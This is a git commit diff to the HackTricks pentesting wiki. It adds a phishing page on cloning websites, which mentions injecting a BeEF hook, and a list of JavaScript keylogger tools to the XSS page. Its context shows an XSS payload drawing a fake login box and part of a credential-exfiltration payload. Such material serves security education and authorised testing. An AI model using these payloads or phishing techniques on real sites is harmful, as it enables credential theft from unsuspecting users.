GitBook: [master] 474 pages modified

2024-11-22 04:33:28 +00:00 · 2021-05-27 13:02:25 +00:00 · 2021-05-27 13:02:25 +00:00 · 87e89bb1a2
commit 87e89bb1a2
parent e765a981c7
3 changed files with 42 additions and 3 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -1,13 +1,14 @@
 # Table of contents

 * [HackTricks](README.md)
+* [About the author](about-the-author.md)
 * [Getting Started in Hacking](getting-started-in-hacking.md)
 * [Pentesting Methodology](pentesting-methodology.md)
 * [External Recon Methodology](external-recon-methodology.md)
 * [Phishing Methodology](phishing-methodology/README.md)
+  * [Clone a Website](phishing-methodology/clone-a-website.md)
  * [Detecting Phising](phishing-methodology/detecting-phising.md)
  * [Phishing Documents](phishing-methodology/phishing-documents.md)
-* [About the author](about-the-author.md)
 * [Exfiltration](exfiltration.md)
 * [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
 * [Brute Force - CheatSheet](brute-force.md)
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@ -651,9 +651,11 @@ for(var i=0; i<ports.length; i++) {
 }
 ```

-_Short times indicate a responding port_ _Longer times indicate no response_
+_Short times indicate a responding port_ _Longer times indicate no response._

-### Box to as for credentials
+Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
+
+### Box to ask for credentials

 ```markup
 <style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
@ -674,6 +676,15 @@ body:username.value+':'+this.value

 When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.

+### Keylogger
+
+Just searching in github I found a few different ones:
+
+* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
+* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
+* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
+* You can also use metasploit `http_javascript_keylogger`
+
 ### XSS - Stealing CSRF tokens

 ```javascript
--- a/phishing-methodology/clone-a-website.md
+++ b/phishing-methodology/clone-a-website.md
@ -0,0 +1,27 @@
+# Clone a Website
+
+For a phishing assessment sometimes it might be useful to completely **clone a website**.
+
+Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user. 
+
+There are different tools you can use for this purpose:
+
+### wget
+
+```text
+wget -mk -nH
+```
+
+### goclone
+
+```bash
+#https://github.com/imthaghost/goclone
+oclone <url>
+```
+
+### Social Engineering Toolit
+
+```bash
+#https://github.com/trustedsec/social-engineer-toolkit
+```
+